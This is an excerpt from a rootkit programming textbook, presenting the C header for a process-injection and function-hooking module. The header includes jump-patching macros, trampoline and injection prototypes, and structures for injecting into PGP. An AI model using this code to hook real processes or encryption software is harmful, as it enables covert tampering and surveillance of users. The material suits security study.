
The file injectManager.h has been added to support process injection. Of particular interest is CALL_ DATA_STRUCT. This is the structure filled out when ZwMapViewOfSection has found a function to hook.

The members of CALL_DATA_STRUCT are as follows:

  • index-Each process hook must have an index to identify it from other hooks.

  • parameters–The number of parameters passed to the hooked function must be saved.

  • hookFunction–The address of the hooked function must be saved.

  • callType–The call type, standard or C, must be known when returning from a call.

  • stackOffset–This is set to zero unless using a pattern that must start after the first instruction.

Following is the code:

  // Copyright Ric Vieler, 2006 // Support header for injectManager.c #ifndef _USER_HOOK_INJECTION_H_ #define _USER_HOOK_INJECTION_H_ #define USERHOOK_beforeEncode 0 #define TOTAL_HOOKS 1 #define MAX_INSTRUCTION 36 #define STDCALL_TYPE 0 #define CDECL_TYPE 1 #define EMIT_FOUR( x ) __asm{ __asm _emit x __asm _emit x __asm _emit x __asm _emit x } #define PUSH_STACKFRAME( ) __asm{ __asm push ebp __asm mov ebp, esp __asm sub esp, __LOCAL_SIZE __asm push edi __asm push esi __asm push ebx __asm pushfd } #define POP_STACKFRAME( ) __asm{ __asm popfd __asm pop ebx __asm pop esi __asm pop edi __asm mov esp, ebp __asm pop ebp } #define INJECT_JUMP( from, to ) { ((PCHAR)from)[0] = (CHAR)0xe9; *((DWORD *)&(((PCHAR)(from))[1])) = (PCHAR)(to) - (PCHAR)(from) - 5; } #define GET_JUMP( from ) (((PCHAR)from)[0]==(CHAR)0xe9)? (*((DWORD *)&(((PCHAR)(from))[1])) + 5 + (DWORD)(from)) : 0 #pragma pack(1) // Prototypes for functions in kernel32.dll that are expected to be used in hook functions typedef int (__stdcall * PROTOTYPE_lstrlenA)( LPCSTR lpString ); typedef int (__stdcall * PROTOTYPE_lstrlenW)( LPCWSTR lpString ); typedef LPSTR (__stdcall * PROTOTYPE_lstrcpynA)( LPSTR lpString1, LPCSTR lpString2, int iMaxLength ); typedef LPWSTR (__stdcall * PROTOTYPE_lstrcpynW)( LPWSTR lpString1, LPCWSTR lpString2, int iMaxLength ); typedef LPSTR (__stdcall * PROTOTYPE_lstrcpyA)( LPSTR lpString1, LPCSTR lpString2 ); typedef LPWSTR (__stdcall * PROTOTYPE_lstrcpyW)( LPWSTR lpString1, LPCWSTR lpString2 ); typedef int (__stdcall * PROTOTYPE_lstrcmpiA)( LPCSTR lpString1, LPCSTR lpString2 ); typedef int (__stdcall * PROTOTYPE_lstrcmpiW)( LPCWSTR lpString1, LPCWSTR lpString2 ); typedef int (__stdcall * PROTOTYPE_lstrcmpA)( LPCSTR lpString1, LPCSTR lpString2 ); typedef int (__stdcall * PROTOTYPE_lstrcmpW)( LPCWSTR lpString1, LPCWSTR lpString2 ); typedef LPSTR (__stdcall * PROTOTYPE_lstrcatA)( LPSTR lpString1, LPCSTR lpString2 ); typedef LPWSTR (__stdcall * PROTOTYPE_lstrcatW)( LPWSTR lpString1, LPCWSTR lpString2 ); typedef VOID (__stdcall * PROTOTYPE_OutputDebugStringA)( LPCSTR lpOutputString ); typedef VOID (__stdcall * PROTOTYPE_OutputDebugStringW)( LPCWSTR lpOutputString ); typedef HANDLE (__stdcall * PROTOTYPE_CreateFileW)( LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile ); typedef VOID (__stdcall * PROTOTYPE_Sleep)( DWORD dwMilliseconds ); typedef BOOL (__stdcall * PROTOTYPE_CloseHandle)( HANDLE hObject ); typedef DWORD (__stdcall * PROTOTYPE_GetCurrentProcessId)( VOID ); typedef DWORD (__stdcall * PROTOTYPE_GetCurrentThreadId)( VOID ); typedef struct _CALL_DATA_STRUCT {  UINT index;  UINT parameters;  PCHAR hookFunction;  UINT callType;  UINT stackOffset; } CALL_DATA_STRUCT; typedef struct _IN_PROCESS_DATA { // function addresses PROTOTYPE_lstrlenA plstrlenA; PROTOTYPE_lstrlenW plstrlenW; PROTOTYPE_lstrcpynA plstrcpynA; PROTOTYPE_lstrcpynW plstrcpynW; PROTOTYPE_lstrcpyA plstrcpyA; PROTOTYPE_lstrcpyW plstrcpyW; PROTOTYPE_lstrcmpiA plstrcmpiA; PROTOTYPE_lstrcmpiW plstrcmpiW; PROTOTYPE_lstrcmpA plstrcmpA; PROTOTYPE_lstrcmpW plstrcmpW; PROTOTYPE_lstrcatA plstrcatA; PROTOTYPE_lstrcatW plstrcatW; PROTOTYPE_OutputDebugStringA pOutputDebugStringA; PROTOTYPE_OutputDebugStringW pOutputDebugStringW; PROTOTYPE_CreateFileW pCreateFileW; PROTOTYPE_CloseHandle pCloseHandle; PROTOTYPE_Sleep pSleep; PROTOTYPE_GetCurrentProcessId pGetCurrentProcessId; PROTOTYPE_GetCurrentThreadId pGetCurrentThreadId; char debugString[64]; } IN_PROCESS_DATA; BOOL processInject( CALL_DATA_STRUCT* pCallData, int hooks2find, PCHAR pUserMem ); PCHAR allocateUserMemory( void ); BOOL createTrampoline( PCHAR originalAddress, PCHAR newStartAddress, PCHAR newEndAddress ); ULONG getx86Instruction( PCHAR originalCode, PCHAR instructionBuffer, ULONG bufferLength ); DWORD BeforeOriginalFunction( DWORD hookIndex, PDWORD originalStack, DWORD* returnParameter, IN_PROCESS_DATA* callData ); void AfterOriginalFunction( DWORD hookIndex, PDWORD originalStack, DWORD* returnParameter, IN_PROCESS_DATA* callData ); BOOL makeWritable( PVOID address, ULONG size ); // structures required to inject into PGP typedef struct _PGPOption {  unsigned int type;  unsigned int flags;  unsigned int value;  unsigned int valueSize;  void* subOptions;  void* handlerProc; } PGPOption; typedef struct _PGPVersion {  unsigned short majorVersion;  unsigned short minorVersion; } PGPVersion; typedef struct _PGPOptionList {  unsigned int magic;  PGPVersion version;  void* context;  int err;  unsigned int flags;  unsigned short maxOptions;  unsigned short numOptions;  PGPOption* options; } PGPOptionList; typedef struct _PFLFileSpec {  unsigned int magic;  void* memoryMgr;  unsigned int type;  unsigned int dataSize;  void* vtbl;  void* data; } PFLFileSpec; typedef struct _FILELIST {  char* name;  int IsDirectory;  struct _FILELIST* next; } FILELIST; #define PGP_OK 0 #define PGP_BAD_API -11460 #define  PGP_FILE_FAIL -11991 #endif 

Professional Rootkits
Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
EAN: 2147483647
Year: 2007
Pages: 229
Authors: Ric Vieler © 2008-2017.
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